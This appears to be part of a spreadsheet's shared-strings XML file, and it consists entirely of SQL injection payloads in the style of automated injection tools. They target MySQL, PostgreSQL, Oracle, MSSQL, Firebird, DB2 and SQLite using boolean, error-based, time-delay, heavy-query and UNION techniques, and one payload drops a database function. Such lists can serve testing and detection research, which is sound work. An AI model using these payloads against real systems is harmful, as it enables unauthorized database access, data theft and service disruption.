    <t>1'+ ( select 'iqxn' where 1146 = 1146 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1"  )  )   as wnzf where 3352 = 3352 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'byxb' where 8351 = 8351 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  ||'</t>
  </si>
  <si>
    <t>1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'pziy' = 'pziy</t>
  </si>
  <si>
    <t>-4498 )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 )</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null#</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'yaim' = 'yaim</t>
  </si>
  <si>
    <t>1' waitfor delay '0:0:5' and 'jree' = 'jree</t>
  </si>
  <si>
    <t>1%' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-9313%" )  or 5971 = 4572#</t>
  </si>
  <si>
    <t>1' )  as scnn where 9274 = 9274</t>
  </si>
  <si>
    <t xml:space="preserve">-4308' )  or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 </t>
  </si>
  <si>
    <t>1%" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1" rlike sleep ( 5 ) </t>
  </si>
  <si>
    <t>-1791' union all select 9316,9316,9316,9316,9316,9316,9316,9316--</t>
  </si>
  <si>
    <t>-2284%"  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1'|| ( select 'ryyc' from dual where 5196 = 5196 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" )  as mszg where 6184 = 6184 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "ksip" like "ksip</t>
  </si>
  <si>
    <t>1 )  as yduh where 6481 = 6481 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( "khuw" like "khuw</t>
  </si>
  <si>
    <t>1  )  )   as fmpr where 3103 = 3103 and elt ( 9970 = 9297,9297 ) --</t>
  </si>
  <si>
    <t>1" or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "deeu" like "deeu</t>
  </si>
  <si>
    <t>-6488' or 5164 = 9234</t>
  </si>
  <si>
    <t>1  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' where 7464 = 7464 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1%' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 )  as dlkh where 6179 = 6179 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1" )  where 1699 = 1699 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   as hqwy where 4433 = 4433 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1' )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'pzoe' where 2977 = 2977 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' )  where 1646 = 1646 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( 7758 = 4628 ) *4628 and   (  (   ( "wzas" = "wzas</t>
  </si>
  <si>
    <t>1 where 8102 = 8102 and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 where 7240 = 7240 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "nxvp" = "nxvp</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( "mkal" like "mkal</t>
  </si>
  <si>
    <t>1'|| ( select 'jmhb' where 1794 = 1794 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) </t>
  </si>
  <si>
    <t>1 where 6100 = 6100 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-4031"  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +ch</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 5322 = 6200 )  then 5322 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>-3933%"  )  )   or elt ( 8142 = 2978,2978 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 )  as khkv where 2944 = 2944 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>-9574%'  )  )   union all select 5645,5645,5645,5645,5645,5645,5645--</t>
  </si>
  <si>
    <t>1 where 8214 = 8214 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1'+ ( select yjyp where 9696 = 9696</t>
  </si>
  <si>
    <t>1 )  as pcnd where 4589 = 4589 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7700%' )  union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#</t>
  </si>
  <si>
    <t>1' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'mnod' = 'mnod</t>
  </si>
  <si>
    <t>1%'  )  )   )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  9333 = 9333</t>
  </si>
  <si>
    <t>1%'  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  8189 = 8189</t>
  </si>
  <si>
    <t>1'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 'ayjb' like 'ayjb</t>
  </si>
  <si>
    <t>-9774'  )  )   )  union all select 6954,6954,6954#</t>
  </si>
  <si>
    <t>1 )  where 7956 = 7956 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (  'ywxe' like 'ywxe</t>
  </si>
  <si>
    <t>1'  )  )   as cpwx where 5378 = 5378 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1'|| ( select 'xuof' from dual where 8794 = 8794 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( 7015 = 7015</t>
  </si>
  <si>
    <t xml:space="preserve">1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>1  )  )   as zoso where 3633 = 3633</t>
  </si>
  <si>
    <t>1" or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "uosc" = "uosc</t>
  </si>
  <si>
    <t>-6656" )  union all select 3931#</t>
  </si>
  <si>
    <t>1' )  rlike sleep ( 5 )  and  ( 'boto' = 'boto</t>
  </si>
  <si>
    <t>select * from generate_series ( 5846,5846,case when  ( 5846 = 5227 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( 'tfnb' = 'tfnb</t>
  </si>
  <si>
    <t>1 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1 )  where 9645 = 9645 union all select null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   and 3228 = 7376#</t>
  </si>
  <si>
    <t>select pg_sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>-5548' where 4477 = 4477 union all select 4477,4477,4477,4477,4477,4477,4477,4477,4477,4477--</t>
  </si>
  <si>
    <t>1%"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-2781  )  )   )  or 2573 = 5848--</t>
  </si>
  <si>
    <t>1'  )  )   as gchn where 5856 = 5856</t>
  </si>
  <si>
    <t>1"  )  )   as cduw where 4495 = 4495</t>
  </si>
  <si>
    <t>-3719" union all select 6609,6609,6609,6609#</t>
  </si>
  <si>
    <t>1'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 3592 = 3592 )  then 3592 else 3592* ( select 3592 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'snad' like 'snad</t>
  </si>
  <si>
    <t>1'|| ( select 'ezse' from dual where 3821 = 3821</t>
  </si>
  <si>
    <t>1%' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and '%' = '</t>
  </si>
  <si>
    <t>1' )  as fxid where 5926 = 5926</t>
  </si>
  <si>
    <t>1%" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and "%" = "</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 9932 = 9932</t>
  </si>
  <si>
    <t>-9217 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' )  as noqp where 4042 = 4042 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 7125 = 7125 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4250 = 4250 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>1%' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1" )  where 7919 = 7919 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 )  and   (  (  'taaj' = 'taaj</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1" )  as wmng where 5976 = 5976</t>
  </si>
  <si>
    <t>1"  )  )   )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  where 1093 = 1093 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( 'qslr' = 'qslr</t>
  </si>
  <si>
    <t>1%" )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as xyuy where 6894 = 6894</t>
  </si>
  <si>
    <t>1" )  as kdvb where 2651 = 2651 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1 )  as bgvd where 1753 = 1753 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-6200' where 9150 = 9150 union all select 9150,9150,9150,9150,9150,9150,9150#</t>
  </si>
  <si>
    <t>1"  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( "jywy" like "jywy</t>
  </si>
  <si>
    <t>select  ( case when  ( 6276 = 6276 )  then 6276 else 6276* ( select 6276 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1  )  )   and make_set ( 8554 = 3286,3286 )  and   (  (  7385 = 7385</t>
  </si>
  <si>
    <t>-8911%' or 9323 = 9323#</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'lshk' like 'lshk</t>
  </si>
  <si>
    <t>-2743 union all select 6757,6757,6757,6757,6757,6757--</t>
  </si>
  <si>
    <t>-7548 or 2850 = 9666</t>
  </si>
  <si>
    <t>1' where 5251 = 5251 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>-4047'|| ( select 'rqta' from dual where 9743 = 9743 union all select 9743,9743,9743#</t>
  </si>
  <si>
    <t>1'|| ( select 'vvpn' from dual where 7011 = 7011 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1'  )  )   as dqby where 9256 = 9256</t>
  </si>
  <si>
    <t>1' where 2913 = 2913 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>-4012" )  or make_set ( 9354 = 9354,7185 )  and  ( "ccfn" = "ccfn</t>
  </si>
  <si>
    <t xml:space="preserve">-1830"  )  )   as bptv where 4805 = 4805 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr </t>
  </si>
  <si>
    <t>1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'tqvy' like 'tqvy</t>
  </si>
  <si>
    <t>1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and 'aytf' like 'aytf</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1'+ ( select 'kqnj' where 9483 = 9483 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1%' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 2869 = 9448,1,1/0 ) </t>
  </si>
  <si>
    <t>1%" and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-1907"  )  )   or 2782 = 3591</t>
  </si>
  <si>
    <t>-3436 )  or 9281 = 3172</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4# ljph</t>
  </si>
  <si>
    <t>1'|| ( select 'eayf' where 5431 = 5431 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>1' )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( 'yznd' like 'yznd</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 2350 = 8682 )  then 2350 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( 8982 = 8027 ) *8027 and   (  (   ( 'qkrv' = 'qkrv</t>
  </si>
  <si>
    <t>1" and elt ( 2373 = 5817,5817 )  and "rsdt" = "rsdt</t>
  </si>
  <si>
    <t>-1917" )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1"  )  )   as ndbk where 5042 = 5042 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  'bhlx' like 'bhlx</t>
  </si>
  <si>
    <t>-6948"  )  )   as ojjl where 1300 = 1300 or 6872 = 6872--</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( 8981 = 8981</t>
  </si>
  <si>
    <t>1'|| ( select 'znba' where 8323 = 8323</t>
  </si>
  <si>
    <t>1  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 3530 = 3530</t>
  </si>
  <si>
    <t>1%"  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1 where 2751 = 2751 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'mymg' = 'mymg</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "yzjl" like "yzjl</t>
  </si>
  <si>
    <t>1 where 4477 = 4477 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select * from generate_series ( 7610,7610,case when  ( 7610 = 9416 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t xml:space="preserve">-9959" )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 </t>
  </si>
  <si>
    <t>1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'uqfs' = 'uqfs</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000  )  )  ||'</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>-9922'  )  )   union all select 2193,2193,2193--</t>
  </si>
  <si>
    <t xml:space="preserve">1,iif ( 6625 = 6625,1,1/0 ) </t>
  </si>
  <si>
    <t>1'|| ( select 'ativ' from dual where 4746 = 4746 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1"  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  "uwdz" = "uwdz</t>
  </si>
  <si>
    <t>if ( 7899 = 7899 )  select 7899 else drop function zbbp--</t>
  </si>
  <si>
    <t>1" )  as oztl where 6655 = 6655 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4967 = 8866 and   (  (   ( "jzyn" like "jzyn</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "squx" like "squx</t>
  </si>
  <si>
    <t>1'|| ( select 'vqag' from dual where 8154 = 8154 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" where 9760 = 9760 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) </t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'kerg' like 'kerg</t>
  </si>
  <si>
    <t>1 )  where 3565 = 3565 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%" and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  where 5280 = 5280 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'fowu' like 'fowu</t>
  </si>
  <si>
    <t>1'|| ( select 'xjcg' from dual where 5815 = 5815 union all select null,null,null#</t>
  </si>
  <si>
    <t>1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( 'brob' = 'brob</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 4610 = 4610</t>
  </si>
  <si>
    <t>1' and make_set ( 8403 = 8403,8899 )  and 'niux' = 'niux</t>
  </si>
  <si>
    <t>-4322'  )  )   as magw where 1627 = 1627 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 1</t>
  </si>
  <si>
    <t>-4305 )  as ldrt where 2567 = 2567 union all select 2567,2567,2567,2567,2567,2567,2567#</t>
  </si>
  <si>
    <t>1'+ ( select shec where 3589 = 3589 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>1%" )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>-5009 )  where 8463 = 8463 union all select 8463,8463,8463,8463,8463,8463--</t>
  </si>
  <si>
    <t>-7741' )  where 8271 = 8271 union all select 8271,8271,8271,8271,8271,8271,8271#</t>
  </si>
